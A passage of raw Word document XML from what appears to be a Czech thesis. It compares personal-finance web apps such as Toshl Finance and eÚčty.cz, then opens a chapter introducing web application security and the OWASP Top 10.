      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve">předem </w:t>
      </w:r>
      <w:r>
        <w:t>vytv</w:t>
      </w:r>
      <w:r w:rsidR="000A7816">
        <w:t>áří</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vlastní hierarchii kategorií. </w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">edna transakce může být přiřazena právě jedné kategorii. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRPr="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:r>
        <w:t>Transakce je možné importovat z CSV souboru, přičemž aplikace podporuje výstupní formát několika českých bank.</w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ze automatizovat vytváření pravidelných transakcí. </w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t>Existuje zjednodušená</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t xml:space="preserve">verze služby </w:t>
      </w:r>
      <w:r>
        <w:t>optimalizov</w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t>aná</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro mobilní telefony</w:t>
      </w:r>
      <w:r w:rsidR="00F72E33">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc387327801"/>
      <w:r>
        <w:t>Statistiky a plánování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00F72E33" w:rsidRPr="00F72E33" w:rsidRDefault="00F72E33" w:rsidP="00F72E33">
      <w:r>
        <w:t xml:space="preserve">Aplikace umožňuje </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>zobrazení grafů</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve">vývoje bilance, příjmů a výdajů </w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>čase</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Statistiky</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve"> týkající se vývoje</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve"> transakcí v</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve"> jednotlivých </w:t>
      </w:r>
      <w:r>
        <w:t>kategori</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve">ch </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">jsou dostupné </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>za libovolné období</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ve formě tabulky</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve"> a grafu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">odíl kategorií na výdajích je </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve">zobrazen pro všechny úrovně jejich hierarchie. </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve">Pro plánování </w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t xml:space="preserve">je </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve">možné </w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>vytvoř</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t xml:space="preserve"> jed</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>n rozpoč</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FB0412">
        <w:t>t pro každou kategorii.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D067F4">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc387327802"/>
      <w:r>
        <w:t>Zabezpečení a zálohování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="00D53AF6" w:rsidRDefault="00D53AF6" w:rsidP="00D53AF6">
      <w:r>
        <w:t xml:space="preserve">Aplikace vyžaduje pro registraci ověření emailové adresy. Pro přihlášení se používá kombinace uživatelského jména a hesla, které musí splňovat minimální délku a při jeho nastavování je zobrazen indikátor síly hesla. Během přihlašování a po </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t>něm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve">je </w:t>
      </w:r>
      <w:r>
        <w:t>veškerá komunikace</w:t>
      </w:r>
      <w:r w:rsidR="00CC3CAD">
        <w:t xml:space="preserve"> přenášena</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> šifrovaně pomocí ověřeného certifikátu. Aplikace neumožňuje provést zálohu dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D067F4" w:rsidRDefault="00D067F4" w:rsidP="00D53AF6">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc387327803"/>
      <w:r>
        <w:t>Další funkce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00445429" w:rsidRPr="00445429" w:rsidRDefault="00445429" w:rsidP="00445429">
      <w:r>
        <w:t>Speciální funkcí aplikace je možnost zadání poptávky po finančních produktech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="0041175A" w:rsidP="005E33BB">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc387327804"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Finance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="0041175A" w:rsidRDefault="0041175A" w:rsidP="0041175A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je webová služba pro správu financí, která </w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t xml:space="preserve">je propojena s </w:t>
      </w:r>
      <w:r>
        <w:t>mobilní</w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t>mi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> klienty</w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t xml:space="preserve"> dostupnými</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro všechny rozšířené platformy. Vznikla</w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve"> v roce 2010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ve Slovinsku</w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> roce 2012 </w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve">se zakladatelé přemístili do Silicon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009035F8">
        <w:t>Valley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve"> v San </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009035F8">
        <w:t>Franciscu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve">, kde se s úspěchem připojili do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009035F8">
        <w:t>startup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve"> akcelerátoru „500 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009035F8">
        <w:t>Startups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve">“. V San </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009035F8">
        <w:t>Franciscu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve"> je nyní sídlo společnosti, </w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vývoj probíhá ve Slovinsku a její servery jsou umístěny v Německu. Jedná se </w:t>
      </w:r>
      <w:r w:rsidR="009576E2">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="005B3691">
        <w:t>uznávaný mezinárodní</w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t xml:space="preserve"> projekt</w:t>
      </w:r>
      <w:r w:rsidR="00A82A64">
        <w:t xml:space="preserve"> s několika oceněními</w:t>
      </w:r>
      <w:r w:rsidR="009035F8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B3691">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1894360"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION caKfmQLoznHu4p5A \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[8]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="4189095"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="20955"/>
            <wp:docPr id="8" name="Obrázek 7" descr="tosh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shl.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="4189095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRPr="005B3691" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc387327913"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">. Ukázka přehledu transakcí v aplikaci </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Finance.</w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2" w:rsidRPr="005B0FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468335"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION caKfmQLoznHu4p5A \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[8]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc387327805"/>
      <w:r>
        <w:t>Evidence transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="0090609F" w:rsidRDefault="00AE48D9" w:rsidP="0090609F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sází na jednoduchost a uživatelskou přívětivost. Dokáže evidovat pouze jeden bankovní účet v jedné měně, kterou si uživatel může zvolit. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> přichází místo kategorií s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (štítky). Každé transakci musí </w:t>
      </w:r>
      <w:r w:rsidR="00C404E1">
        <w:t xml:space="preserve">být </w:t>
      </w:r>
      <w:r>
        <w:t>přiřazen alespoň jeden štítek</w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t xml:space="preserve">. Štítky nejsou hierarchické a nelze je nijak uspořádat. Importování transakcí ze souboru není možné, ale lze automatizovat pravidelné transakce. </w:t>
      </w:r>
      <w:r w:rsidR="00C404E1">
        <w:t>Transakce</w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t xml:space="preserve"> lze spravovat přes mobilní aplikaci, která je dostupná pro všechny rozšířené mobilní platformy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="005B3691" w:rsidP="0090609F">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc387327806"/>
      <w:r>
        <w:t>Statistiky a plánování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="00D551FD" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:r>
        <w:t>Aplikace zobrazí graf</w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vývoje</w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t xml:space="preserve"> příjmů,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> výdajů</w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t xml:space="preserve"> a bilance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v čase. </w:t>
      </w:r>
      <w:r w:rsidR="0090609F">
        <w:t>Dále jsou dostupné grafy</w:t>
      </w:r>
      <w:r w:rsidR="00D551FD">
        <w:t xml:space="preserve"> vývoje výdajů za jednotlivé štítky a porovnání součtu všech výdajů za zvolené časové období</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t xml:space="preserve"> podle jednotlivých štítků</w:t>
      </w:r>
      <w:r w:rsidR="00D551FD">
        <w:t xml:space="preserve">. Pokud je transakce označena například třemi štítky, tak je </w:t>
      </w:r>
      <w:r w:rsidR="00D551FD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">započítána do třech sloupců tohoto grafu. Je </w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t xml:space="preserve">také </w:t>
      </w:r>
      <w:r w:rsidR="00D551FD">
        <w:t>možné zobrazit graf podílu jednotlivých štítků na celkových výdajích.</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRPr="00F72E33" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:r>
        <w:t xml:space="preserve">Plánování </w:t>
      </w:r>
      <w:r w:rsidR="00184724">
        <w:t>je přítomno v podobě rozpočtů, které mohou být denní, týdenní, měsíční, roční a</w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00184724">
        <w:t xml:space="preserve">jednorázové. U každého rozpočtu </w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t>je</w:t>
      </w:r>
      <w:r w:rsidR="00184724">
        <w:t xml:space="preserve"> nastav</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t>ena</w:t>
      </w:r>
      <w:r w:rsidR="00184724">
        <w:t xml:space="preserve"> finální částka a případně seznam štítků, na které se rozpočet vztahuje. Výsledkem rozpočtu je graf ukazující jaká část </w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t xml:space="preserve">stanoveného </w:t>
      </w:r>
      <w:r w:rsidR="00184724">
        <w:t>obnosu již byla utracena.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc387327807"/>
      <w:r>
        <w:t>Zabezpečení a zálohování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="00490EF0" w:rsidP="005B3691">
      <w:r>
        <w:t>K registraci pro používání aplikace je nutné zadat email a heslo</w:t>
      </w:r>
      <w:r w:rsidR="00EC1AF6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nebo se přihlásit pomocí </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> účtu</w:t>
      </w:r>
      <w:r w:rsidR="005B3691">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Veškerá komunikace probíhá šifrovaně. Data je možné exportovat do několika formátů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3691" w:rsidRDefault="005B3691" w:rsidP="005B3691">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc387327808"/>
      <w:r>
        <w:t>Další funkce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="00CB6807" w:rsidRDefault="00490EF0" w:rsidP="00CB6807">
      <w:r>
        <w:t xml:space="preserve">Aplikace umožňuje nastavení zasílání měsíčních reportů na emailovou adresu. Základní verze aplikace je dostupná zdarma, nicméně je vhodná pouze pro evidenci transakcí s omezením na jeden příjem měsíčně. Statistiky a </w:t>
      </w:r>
      <w:r w:rsidR="001F7A1D">
        <w:t>rozpočty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F7A1D">
        <w:t>jsou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dostupné pouze v placené verzi za </w:t>
      </w:r>
      <w:r w:rsidR="00962595">
        <w:t>necelých 20 dolarů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7A1D" w:rsidRDefault="001F7A1D" w:rsidP="001F7A1D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc387327809"/>
      <w:r>
        <w:t>Shrnutí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00E652A1" w:rsidRPr="00E652A1" w:rsidRDefault="001832AF" w:rsidP="00E652A1">
      <w:r>
        <w:t xml:space="preserve">Každé z popsaných řešení nabízí různé funkce. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Finance je zaměřen</w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na dobrou použitelnost, přehlednost a jednoduché ovládání. eÚčty.cz </w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>komplex</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t>nější</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve">má </w:t>
      </w:r>
      <w:r>
        <w:t>více funkcí za cenu menší přehlednosti a vyšší složitosti pro nenáročné uživatele. Moře financí</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> není natolik složité</w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t xml:space="preserve"> ani komplexní</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> jako </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00651168">
        <w:t>eÚčty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00651168">
        <w:t>, ale přitom ne</w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t>dosahuje</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D1632">
        <w:t>použitelnosti srovnatelné s</w:t>
      </w:r>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00651168">
        <w:t>Toshl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00651168">
        <w:t xml:space="preserve"> Finance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E33BB" w:rsidRDefault="005E33BB" w:rsidP="005E33BB">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Ref383961674"/>
      <w:bookmarkStart w:id="65" w:name="_Ref383961703"/>
      <w:bookmarkStart w:id="66" w:name="_Toc387327810"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Zabezpečení webových aplikací</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="009023C7" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Webové</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> aplikace jsou oproti </w:t>
      </w:r>
      <w:r>
        <w:t>běžným klientským</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> aplikacím obecně </w:t>
      </w:r>
      <w:r w:rsidR="00E75933">
        <w:t>snáze</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> zneužitelné, protože jsou dostupné odkudkoliv nejen svým uživatelům, ale </w:t>
      </w:r>
      <w:r>
        <w:t>také</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> potencionálním útočníkům. </w:t>
      </w:r>
      <w:r w:rsidR="00577497">
        <w:t xml:space="preserve">Bezpečnosti </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aplikace je nutné věnovat obzvláště zvýšenou pozornost, jestliže uchovává citlivá data, </w:t>
      </w:r>
      <w:r w:rsidR="00E75933">
        <w:t>jakými</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> informace o osobních financích bezesporu jsou.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD478C" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Problematikou bezpečnosti internetových aplikací se zabývá neziskové sdružení </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t xml:space="preserve">Open Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0064783D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064783D">
        <w:t>Security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0064783D">
        <w:t xml:space="preserve"> Project </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP), které se snaží šířit osvětu o tom, jak vyvíjet bezpečné internetové aplikace. Jedním z jejich projektů je </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, který na základě podkladů od společností zabývajících se bezpečnostními audity a výrobců </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SaaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> řešení mapuje 10 nejvíce problémových zranitelností webových aplikací. První verze tohoto dokumentu vyšla v roce 2003, další v roce 2004, 2007, 2010 a poslední v roce 2013. Do tohoto výběru se zranitelnosti nevybírají pouze podle toho, že jsou nejrozšířenější, ale také podle toho, jak velkou hrozbu jejich zneužití pro webovou aplikaci představuje.</w:t>
      </w:r>
      <w:r w:rsidR="00007F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344845"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION DBmrpr0B1wKcuKKF \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[9]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Těchto 10 nejdůležitějších zranitelností z poslední verze </w:t>
      </w:r>
      <w:r w:rsidRPr="0064783D">
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344850"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00533AAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009023C7">
        <w:t>bude představeno v této kapitole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
